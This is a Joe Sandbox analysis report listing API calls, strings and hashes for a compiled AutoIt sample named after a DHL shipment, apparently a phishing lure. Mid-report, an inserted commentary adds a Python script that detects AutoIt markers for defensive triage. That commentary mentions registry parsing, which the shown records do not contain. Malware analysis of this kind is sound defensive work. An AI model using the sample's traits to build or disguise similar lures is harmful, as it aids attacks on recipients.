• Opcode Fuzzy Hash: 7e90cbc7d03c01bff2656df82f276ceee45f59f4bbc53c9cb2cda2371d34fa70
• Instruction Fuzzy Hash: B8416D7110025A8BCF60EF50E895AEF3764FF12308F644465FE651B692DB30AE1AEB60
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C8755E
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00C87565
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C87578
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00C87580
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C8758B
                                                                                        • DeleteDC.GDI32(00000000), ref: 00C87594
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00C8759E
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C875B2
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C875BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: @U=u$static
                                                                                        • API String ID: 2559357485-3553413495
                                                                                        • Opcode ID: bf346c4891501f8b843c2ce0582606d935180995bfb1485560d9ee516e8b8e2b
                                                                                        • Instruction ID: 3daf5b1e414bce84799fa9becda1259a46d75a48743eb90440213e2990b41a19
                                                                                        • Opcode Fuzzy Hash: bf346c4891501f8b843c2ce0582606d935180995bfb1485560d9ee516e8b8e2b
                                                                                        • Instruction Fuzzy Hash: 1D316C32104214BBDF12AF64DC08FDE3B69EF49324F210329FA25961A0D731D912DBA8
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C3E2A0,00000010,?,Bad directive syntax error,00C8F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C5F7C2
                                                                                        • LoadStringW.USER32(00000000,?,00C3E2A0,00000010), ref: 00C5F7C9
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • _wprintf.LIBCMT ref: 00C5F7FC
                                                                                        • __swprintf.LIBCMT ref: 00C5F81E
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C5F88D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 1506413516-4153970271
                                                                                        • Opcode ID: 3b45ce6ce4ae872466df55223502b530710289e9d0257d26ddad1a76f55d196a
                                                                                        • Instruction ID: efa69afb750b07a1698812968f35a967f1200b86832023ba678966a87b646646
                                                                                        • Opcode Fuzzy Hash: 3b45ce6ce4ae872466df55223502b530710289e9d0257d26ddad1a76f55d196a
                                                                                        • Instruction Fuzzy Hash: 23217C3290021EFFCF15EF90CC0AEEE7739BF18304F040469F515660A2EA31AA59EB55
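The record above is the AutoIt3 runtime's script-error reporter: the `Line %d (File "%s"):` format strings, the `Bad directive syntax error` text and the `>>>AUTOIT SCRIPT<<<` resource name are interpreter strings, which is what the "compiled AutoIt script" signature for this sample rests on. The following static triage check is an added example and not part of the Joe Sandbox report or of AutoIt itself: it scans a byte buffer for those two strings plus the `AU3!EA06` script-header magic (assumed from general AutoIt3 knowledge; it does not appear on this page), searching each marker in ASCII and in UTF-16LE because the runtime stores its strings as wide characters. The two input buffers are constructed stand-ins, not the DHL sample.

```python
"""Static triage: does this buffer carry the markers of a compiled AutoIt script?

Added example, not Joe Sandbox code. The script resource name and the error
format are strings visible in the report; AU3!EA06 is the script-header magic
assumed from AutoIt3 knowledge (not on the page). The runtime stores its
strings as UTF-16LE, so each marker is searched in both encodings.
"""
import sys

MARKERS = {
    "script_resource": b">>>AUTOIT SCRIPT<<<",   # seen in the GetModuleHandleW call above
    "au3_header": b"AU3!EA06",                    # assumed AutoIt3 script-header magic
    "error_format": b'Line %d (File "%s"):',      # runtime error-reporter format string
}


def _encodings(marker):
    """ASCII form plus the UTF-16LE form the AutoIt3 runtime uses for wide strings."""
    return (marker, marker.decode("ascii").encode("utf-16-le"))


def find_autoit_markers(data):
    """Return {marker_name: [offsets]} for every marker found in either encoding."""
    hits = {}
    for name, marker in MARKERS.items():
        offsets = []
        for pattern in _encodings(marker):
            start = 0
            while (pos := data.find(pattern, start)) != -1:
                offsets.append(pos)
                start = pos + 1
        if offsets:
            hits[name] = sorted(offsets)
    return hits


def is_compiled_autoit(data):
    """Heuristic verdict: the resource marker plus either the script header or
    the interpreter's error strings. A hit means 'extract and read the script
    next'; it says nothing about what the embedded script does."""
    hits = find_autoit_markers(data)
    return "script_resource" in hits and ("au3_header" in hits or "error_format" in hits)


# Constructed stand-in for a PE image (not the real sample): MZ/PE stubs,
# padding, then the markers laid out as the runtime would store them.
SAMPLE_AUTOIT = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 32
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le") + b"\x00" * 8
    + b"AU3!EA06" + b"\x00" * 8
    + 'Line %d (File "%s"):'.encode("utf-16-le") + b"\x00" * 8
)
SAMPLE_PLAIN = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"nothing to see here" * 4

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_AUTOIT
    print(find_autoit_markers(blob))
    print("compiled AutoIt:", is_compiled_autoit(blob))
```

Run it against a file path to triage a real binary; with no argument it scans the constructed buffer. A positive result only confirms the interpreter wrapper, so the next step is to carve the script resource and read it, since every API listed in these records (MCI sound playback, folder browsing, layered windows, registry hive parsing) belongs to the interpreter and is present whether or not the script uses it.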
                                                                                        APIs
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                          • Part of subcall function 00C07924: _memmove.LIBCMT ref: 00C079AD
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C65330
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C65346
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C65357
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C65369
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C6537A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$_memmove
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 2279737902-1007645807
                                                                                        • Opcode ID: 2a123aa6335c033cc851b67e37f9462f14a923aa6edaccc651fea715def799a6
                                                                                        • Instruction ID: b006f0921251b95ed239035fb7b0346257d0b2a89e28cbf2d975c3fb0bd515f2
                                                                                        • Opcode Fuzzy Hash: 2a123aa6335c033cc851b67e37f9462f14a923aa6edaccc651fea715def799a6
                                                                                        • Instruction Fuzzy Hash: AD118231E501697AD724B761CC4ADFF7B7CEB91F44F100539B411A21E1EEA01D09C6B0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 208665112-3771769585
                                                                                        • Opcode ID: 5ca127a4a6d1d9579c913526eaa3f25123dbcf19bbeb4cdb5e5397e51e5700fa
                                                                                        • Instruction ID: 74a5278c6f4de2c53f52bab25b0051cc1c822e4e732dce64f7aaf09b93156b4a
                                                                                        • Opcode Fuzzy Hash: 5ca127a4a6d1d9579c913526eaa3f25123dbcf19bbeb4cdb5e5397e51e5700fa
                                                                                        • Instruction Fuzzy Hash: 7E11B431504114AFDB28AB70AC8AFEE77BCEF02711F1401BAF455960A1EF759AC2DB54
                                                                                        APIs
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • CoInitialize.OLE32(00000000), ref: 00C6D5EA
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C6D67D
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00C6D691
                                                                                        • CoCreateInstance.OLE32(00C92D7C,00000000,00000001,00CB8C1C,?), ref: 00C6D6DD
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C6D74C
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00C6D7A4
                                                                                        • _memset.LIBCMT ref: 00C6D7E1
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00C6D81D
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C6D840
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00C6D847
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C6D87E
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00C6D880
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: 1c09c9afd4908b27387b6370eb19f5d4f628a7573240cb6ec4bea6492bf56548
                                                                                        • Instruction ID: f05869bc15d8aaf9990bffe2976c3c2f075f0e09786fbfb2a98114fd93aeff6b
                                                                                        • Opcode Fuzzy Hash: 1c09c9afd4908b27387b6370eb19f5d4f628a7573240cb6ec4bea6492bf56548
                                                                                        • Instruction Fuzzy Hash: C7B11E75A00109AFDB14DF64C888EAEBBB9FF49314F148469F90AEB261DB30ED45DB50
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00C5C283
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C5C295
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C5C2F3
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00C5C2FE
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C5C310
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C5C364
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00C5C372
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C5C383
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C5C3C6
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00C5C3D4
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C5C3F1
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00C5C3FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: 6c785cb29542a6027a8813bad964517c87eaee8e2aec58764160ba2b9dd3d7f8
                                                                                        • Instruction ID: 4aeeb0546d88fe90c6da89acd55493172dca4a74c6c27ed56c0993d09a00b03e
                                                                                        • Opcode Fuzzy Hash: 6c785cb29542a6027a8813bad964517c87eaee8e2aec58764160ba2b9dd3d7f8
                                                                                        • Instruction Fuzzy Hash: 48517075B00305AFDB08CFA9DD89BAEBBB6EB88311F14812DF915D72A0D7709E448B14
                                                                                        APIs
                                                                                          • Part of subcall function 00C01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C02036,?,00000000,?,?,?,?,00C016CB,00000000,?), ref: 00C01B9A
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C020D3
                                                                                        • KillTimer.USER32(-00000001,?,?,?,?,00C016CB,00000000,?,?,00C01AE2,?,?), ref: 00C0216E
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00C3BCA6
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C016CB,00000000,?,?,00C01AE2,?,?), ref: 00C3BCD7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C016CB,00000000,?,?,00C01AE2,?,?), ref: 00C3BCEE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C016CB,00000000,?,?,00C01AE2,?,?), ref: 00C3BD0A
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C3BD1C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        • Opcode ID: 2af17e5426906cef2e1898a25da04be2e8d3ab611c39bd033858ab3ea00b2617
                                                                                        • Instruction ID: 0ebb009c3b77ab04252b2f97385a9afa23472b54abf0e8f86597aeaccee4539f
                                                                                        • Opcode Fuzzy Hash: 2af17e5426906cef2e1898a25da04be2e8d3ab611c39bd033858ab3ea00b2617
                                                                                        • Instruction Fuzzy Hash: 84617731520B10DFDB359F15D94CB2AB7F2FB40316F60852DE6928A9A0C7B0BD91EB90
                                                                                        APIs
                                                                                          • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
                                                                                        • GetSysColor.USER32(0000000F), ref: 00C021D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,00C8F910), ref: 00C6A90B
                                                                                        • GetDriveTypeW.KERNEL32(00000061,00CB89A0,00000061), ref: 00C6A9D5
                                                                                        • _wcscpy.LIBCMT ref: 00C6A9FF
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C886FF
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 634782764-2594219639
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C3C2F7
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C3C319
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C3C331
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C3C34F
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C3C370
                                                                                        • DestroyIcon.USER32(00000000), ref: 00C3C37F
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C3C39C
                                                                                        • DestroyIcon.USER32(?), ref: 00C3C3AB
                                                                                          • Part of subcall function 00C8A4AF: DeleteObject.GDI32(00000000), ref: 00C8A4E8
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 2819616528-2594219639
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: __i64tow__itow__swprintf
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 421087845-2263619337
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C8716A
                                                                                        • CreateMenu.USER32 ref: 00C87185
                                                                                        • SetMenu.USER32(?,00000000), ref: 00C87194
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C87221
                                                                                        • IsMenu.USER32(?), ref: 00C87237
                                                                                        • CreatePopupMenu.USER32 ref: 00C87241
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C8726E
                                                                                        • DrawMenuBar.USER32 ref: 00C87276
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                        • String ID: 0$F
                                                                                        • API String ID: 176399719-3044882817
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C59014
                                                                                        • GetDlgCtrlID.USER32 ref: 00C5901F
                                                                                        • GetParent.USER32 ref: 00C5903B
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C5903E
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00C59047
                                                                                        • GetParent.USER32(?), ref: 00C59063
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C59066
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                        • API String ID: 1536045017-2258501812
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C590FD
                                                                                        • GetDlgCtrlID.USER32 ref: 00C59108
                                                                                        • GetParent.USER32 ref: 00C59124
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C59127
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00C59130
                                                                                        • GetParent.USER32(?), ref: 00C5914C
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C5914F
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                        • API String ID: 1536045017-2258501812
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 00C5916F
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00C59184
                                                                                        • _wcscmp.LIBCMT ref: 00C59196
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C59211
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-1428604138
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C26E3E
                                                                                          • Part of subcall function 00C28B28: __getptd_noexit.LIBCMT ref: 00C28B28
                                                                                        • __gmtime64_s.LIBCMT ref: 00C26ED7
                                                                                        • __gmtime64_s.LIBCMT ref: 00C26F0D
                                                                                        • __gmtime64_s.LIBCMT ref: 00C26F2A
                                                                                        • __allrem.LIBCMT ref: 00C26F80
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C26F9C
                                                                                        • __allrem.LIBCMT ref: 00C26FB3
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C26FD1
                                                                                        • __allrem.LIBCMT ref: 00C26FE8
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C27006
                                                                                        • __invoke_watson.LIBCMT ref: 00C27077
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: bc70c3988de69e12adfa2f4eb632f1f2212de67906eb0d04bc6e10cb7d4bb151
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: 9A712A76A00727ABD714DF78EC81B5AB3A4AF04324F144239F424D7A81E770EE449790
APIs
• _memset.LIBCMT ref: 00C62542
• GetMenuItemInfoW.USER32(00CC5890,000000FF,00000000,00000030), ref: 00C625A3
• SetMenuItemInfoW.USER32(00CC5890,00000004,00000000,00000030), ref: 00C625D9
• Sleep.KERNEL32(000001F4), ref: 00C625EB
• GetMenuItemCount.USER32(?), ref: 00C6262F
• GetMenuItemID.USER32(?,00000000), ref: 00C6264B
• GetMenuItemID.USER32(?,-00000001), ref: 00C62675
• GetMenuItemID.USER32(?,?), ref: 00C626BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C62700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C62714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C62735
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: dc966211caba659aa52ce2debe73dada05fd7b1fd2f29d5a09c148ab3f067278
• Instruction ID: e9a41794809897737e1b29ffdaac6c5a26d9fa941c1cd05e4bb55e8491b5b400
• Opcode Fuzzy Hash: dc966211caba659aa52ce2debe73dada05fd7b1fd2f29d5a09c148ab3f067278
• Instruction Fuzzy Hash: 4061AEB0900A49AFDB31CFA4DCC8EBE7BB8EB01344F140069F852A7251D731AE46DB21
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C86FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C86FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00C86FCC
• _memset.LIBCMT ref: 00C86FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C86FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C87067
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: fffdb3a9c45c1b5a694e36e59a0766fbbf5858baa4db9bf3d1dfaa3cbd2dc872
• Instruction ID: 3298a11592c06188cded55f8290b91cea3c15a3765826363f9dee29b747546d0
